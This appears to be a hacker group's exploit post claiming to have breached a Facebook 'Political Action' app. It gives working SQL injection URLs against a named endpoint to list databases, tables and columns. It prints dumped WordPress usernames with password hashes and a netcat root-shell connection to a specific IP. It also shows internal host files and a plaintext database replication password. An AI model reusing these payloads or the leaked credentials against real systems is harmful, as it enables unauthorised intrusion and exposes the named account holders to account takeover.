Facebook Political Action SQL Injection

`====================================================  
FaceBook's servers was hacked again by Inj3ct0r Team  
====================================================  
  
  
  
Part 1 Original: http://inj3ct0r.com/exploits/11638  
  
Part 2 Original: http://inj3ct0r.com/exploits/13403  
  
  
[+] English translation  
Inj3ct0r official website => Inj3ct0r.com  
Inj3ct0r community => 0xr00t.com  
  
__ __ ___  
__ __ /'__`\ /\ \__ /'__`\   
/\_\ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __ ___ ___ ___ ___   
\/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ /'___\ / __`\ /' __` __`\   
\ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ __/\ \__//\ \L\ \/\ \/\ \/\ \   
\ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ /\_\ \____\ \____/\ \_\ \_\ \_\   
\/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/_/\/____/\/___/ \/_/\/_/\/_/  
\ \____/   
\/___/  
  
[0x00] [Introduction]  
[0x01] [Search for bugs / crash]  
[0x02] [0wner]  
[0x03] [Conclusion]  
[0x04] [Greetz]  
  
  
__ __ __   
/'__`\ /'__`\ /'__`\   
/\ \/\ \ __ _/\ \/\ \/\ \/\ \   
\ \ \ \ \/\ \/'\ \ \ \ \ \ \ \ \   
\ \ \_\ \/> </\ \ \_\ \ \ \_\ \  
\ \____//\_/\_\\ \____/\ \____/  
\/___/ \//\/_/ \/___/ \/___/   
[Introduction]  
  
  
  
  
In this log file you will read a limited version of the information gathered and provided, since the most important  
parts are being kept private in order to be analyzed by the proper authorities and close loopholes in the system.  
  
We did not change the main page, do not sell backup server does not delete files.  
  
We have demonstrated the flaw in the system. Start =] ..  
  
  
  
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo  
Sir Zaid Personal RESPECT! y0u helped me in writing the article and find vulnerabilities  
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo  
  
  
  
__ __ _   
/'__`\ /'__`\ /' \   
/\ \/\ \ __ _/\ \/\ \/\_, \   
\ \ \ \ \/\ \/'\ \ \ \ \/_/\ \   
\ \ \_\ \/> </\ \ \_\ \ \ \ \   
\ \____//\_/\_\\ \____/ \ \_\  
\/___/ \//\/_/ \/___/ \/_/  
[Search for bugs / crash]  
  
  
  
inj3ct0r@host [/home]# ./inj3ct0r.com_0day_Search http://apps.facebook.com  
  
...Search Vulnerabilities . . . . . . . . . .. . . .. . . . ..  
  
[+] found 13 vulns and 6 warning  
[+] open 31337 port yes  
[+] connect...  
  
Brevity the soul of wit..  
  
  
inj3ct0r.com@mybox [~]  
  
inj3ct0r.com@host [~]# cd /home  
  
inj3ct0r@host [/home]# ./inj3ct0r.com_0day http://apps.facebook.com  
  
...attack starting . . . . . . . . . .. . . .. . . . ..  
  
__ __ ___   
/'__`\ /'__`\ /'___`\   
/\ \/\ \ __ _/\ \/\ \/\_\ /\ \   
\ \ \ \ \/\ \/'\ \ \ \ \/_/// /__   
\ \ \_\ \/> </\ \ \_\ \ // /_\ \  
\ \____//\_/\_\\ \____//\______/  
\/___/ \//\/_/ \/___/ \/_____/  
  
[0wner]  
  
Successful Shell on 31337 port . . . . .  
  
inj3ct0r.com@host [/home]# ./nc -v 66.220.153.15 31337  
  
...............................................................  
  
  
apps.facebook@host [~]# id  
  
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)  
  
  
-[0x33]- Proofs  
  
  
############  
# REQUESTS #  
############  
  
;===== BASIC INFO  
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--+1  
  
;===== LIST TABLES  
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name),6,7,8,9,10+FROM+information_schema.tables+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1  
  
;===== LIST COLUMNS  
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name,0x3a,column_name),6,7,8,9,10+FROM+information_schema.columns+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1  
  
;===== LIST WORDPRESS USERS/PASS  
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+candukincaid.wp_users--+1  
  
admin:$P$BQFUeKJK810OT9Y/Hmcx/hZdaRBEmw/  
lucia:$P$BqEFbcc1.uPFB8SfIIDcmVq7pc40WK.  
tom:$P$BlBjwW.57R/lHuoGLSUyAutopYdoEt/  
  
-----  
  
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+churchwpdb.wp_users--+1  
  
admin:$P$B6RRs18hNYnYWPgNy0brmY/qPg3W7b.  
test:$P$BuuuSp.VN0Ha5/p11u20ATdWqeEk  
  
-----  
  
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+luciacanduwp.wp_users--  
  
admin:$P$B1jGLGuDkN6gNT68q92h3RG3wG4qwi/  
lucia:$P$BBtUst3KjOqCdTNVVTGdWlgayz  
  
################  
# INFORMATIONS #  
################  
;===== PATH  
/home/tomkincaid/tomkincaid.dreamhosters.com/facebookclient/shared_lib.php  
  
;===== BASIC INFO  
[email protected]  
politicsapp  
5.0.45-log  
  
;===== TABLES  
  
# astro  
** app  
** oscache  
** user  
  
  
# candukincaid  
** wp_commentmeta  
** wp_comments  
** wp_links  
** wp_options  
** wp_postmeta  
** wp_posts  
** wp_px_albumPhotos  
** wp_px_albums  
** wp_px_galleries  
** wp_px_photos  
** wp_px_plugins  
** wp_term_relationships  
** wp_term_taxonomy  
** wp_terms  
** wp_usermeta  
** wp_users  
  
# cemeteries  
** AmazonItem  
** AmazonType  
** CameraType  
** Format  
** Guestbook  
** Links  
** Photo  
** Scan  
  
# churchwpdb  
** wp_comments  
** eventscalendar_main  
** icl_languages  
** icl_languages_translations  
** icl_locale_map  
** icl_translations  
** links  
** options  
** postmeta  
** posts  
** term_relationships  
** term_taxonomy  
** terms  
** usermeta  
** users  
  
# countdownapp  
** oscache  
** user  
  
# crush  
** couple  
** oscache  
** user  
  
# dare  
** flag  
** game  
** item  
** user  
  
# friendiq  
** oscache  
** score  
** user  
  
# giants  
** app  
** league  
** media  
** mediaforuser  
** oscache  
** post  
** team  
** topic  
** user  
  
# hookup  
** couple  
** neverblue  
** oscache  
** user  
  
# jauntlet  
** user  
  
# loccus  
** checkin  
** oscache  
** user  
  
# luciacanduwp  
** wp_comments  
** wp_links  
** wp_options  
** wp_postmeta  
** wp_posts  
** wp_term_relationships  
** wp_term_taxonomy  
** wp_terms  
** wp_usermeta  
** wp_users  
  
# maps  
** place  
** user  
  
# martisor  
** user  
  
# mediax  
** oscache  
** user  
  
# mostlikely  
** callback  
** statement  
** statementforuser  
** user  
  
# music  
** itemforuser  
** oscache  
** user  
  
# pimpfriends  
** activity  
** ad  
** favorite  
** gift  
** giftforho  
** hoforpimp  
** johnforho  
** oscache  
** permission  
** photoforuser  
** room  
** user  
** wall  
** whistle  
  
# plans  
** attend  
** cache  
** event  
** place  
** user  
  
# politicsapp  
** app  
** badge  
** badgeforuser  
** issue  
** oscache  
** position  
** positionforuser  
** post  
** user  
  
# postergifts  
** category  
** categoryproduct  
** categoryrelationship  
** image  
** oscache  
** posterforuser  
** user  
  
# posters2  
** category  
** categoryproduct  
** categoryrelationship  
** image  
** oscache  
** posterforuser  
** user  
  
# projectbasecamp  
** clicktimeproject  
** clicktimereport  
** clicktimetask  
** idcorrelation  
** projectbudget  
** taskforuser  
** user  
  
# pwnfriends  
** photo  
** photoforfriend  
** photoforuser  
** user  
  
# quiz  
** app  
** question  
** quiz  
** result  
** resultforquestion  
** resultforuser  
** user  
  
# seeall  
** network  
** networkforuser  
** test2  
** userpref  
  
# send  
** app  
** item  
** itemforuser  
** neverblue  
** user  
  
# supporter  
** oscache  
** user  
  
# swapu  
** item  
** itemforuser  
** network  
** networkforuser  
** swaptype  
** user  
  
# tomsapps  
** ad  
** adclick  
** app  
** contest  
** notification  
  
# travelbug  
** bug  
** bugcache  
** user  
  
# tv  
** app  
** oscache  
** post  
** series  
** seriesforuser  
** thread  
** threadforuser  
** user  
  
# wikitravel  
** badmap  
** wikitravelimage  
** wikitravelpage  
  
  
---------------------------------------------------------------------------------------------------------------------------------------------------  
  
read /etc/hosts  
  
127.0.0.1 localhost localhost.localdomain   
192.168.1.167 140696-db2.flufffriends.com 140696-db2   
192.168.1.166 140695-db1.flufffriends.com 140695-db1   
192.168.1.165 140694-web2.flufffriends.com 140694-web2   
192.168.1.164 140693-web1.flufffriends.com 140693-web1   
69.63.176.141 api.facebook.com  
208.116.17.80 peanutlabs.com  
  
----------------------------------  
  
/etc/my.cnf  
  
#SERVER 5 IS THE MASTER FOR DB1 AND ROMIS FOR DB1  
  
log-bin=/var/lib/mysqllogs/bin-log  
  
binlog-do-db=fluff2  
  
expire-logs-days=14  
  
  
  
server-id = 2  
  
  
  
#master-host=69.63.180.15  
  
#master-user=tomkincaid_user  
  
#master-password=tomkincaid123  
  
#master-connect-retry=50  
  
replicate-do-db=miserman  
  
  
#log-slave-updates  
  
expire_logs_days = 14  
  
  
goOd =] Nice Hacking old school xD  
  
  
__ __ __   
/'__`\ /'__`\ /'__`\   
/\ \/\ \ __ _/\ \/\ \/\_\L\ \   
\ \ \ \ \/\ \/'\ \ \ \ \/_/_\_<_   
\ \ \_\ \/> </\ \ \_\ \/\ \L\ \  
\ \____//\_/\_\\ \____/\ \____/  
\/___/ \//\/_/ \/___/ \/___/   
[Conclusion]  
  
  
  
There's no 100% security! Be safe my friends! Watch for vulnerabilities and promptly update! Watch for updates Inj3ct0r.com (Inj3ct0r Exploit Database)  
  
  
  
__ __ __ __   
/'__`\ /'__`\/\ \\ \   
/\ \/\ \ __ _/\ \/\ \ \ \\ \   
\ \ \ \ \/\ \/'\ \ \ \ \ \ \\ \_   
\ \ \_\ \/> </\ \ \_\ \ \__ ,__\  
\ \____//\_/\_\\ \____/\/_/\_\_/  
\/___/ \//\/_/ \/___/ \/_/  
[Greetz]  
  
  
  
Greetz all users Inj3ct0r.com and 31337 Inj3ct0r Members!   
  
31337 Inj3ct0r Members:  
  
cr4wl3r, The_Exploited, eidelweiss, SeeMe, XroGuE, agix, gunslinger_, Sn!pEr.S!Te, indoushka,  
  
Sid3^effects, L0rd CrusAd3r, Th3 RDX, r45c4l, Napst3r™, etc..  
  
----------------------------------------------------------------------------------------------  
  
Personally h4x0rz:  
Sir Zaid (none)  
Dante90 http://inj3ct0r.com/author/916  
SONiC http://inj3ct0r.com/author/2545  
**RoAd_KiLlEr** http://inj3ct0r.com/author/2447  
MasterGipy http://inj3ct0r.com/author/2346  
  
You are good hackers. Respect y0u!  
  
  
Sir Zaid, Thank you that pushed me to write this article, and reported the dependence! Personal Respect to you from Inj3ct0r Team!  
  
Friendly projects : Hack0wn.com , SecurityVulns.com, SecurityHome.eu, Xiya.org, Packetstormsecurity.org.. we have many friends)) Go http://inj3ct0r.com/links =]  
  
At the time of publication, all requests to work! Attached images : inj3ct0r.com/facebook_part2.zip  
  
We want to thank the following people for their contribution.  
  
Do not forget to keep track of vulnerabilities in Inj3ct0r.com  
  
H.A.C.K.T.I.V.I.S.M. WIN! =]  
  
`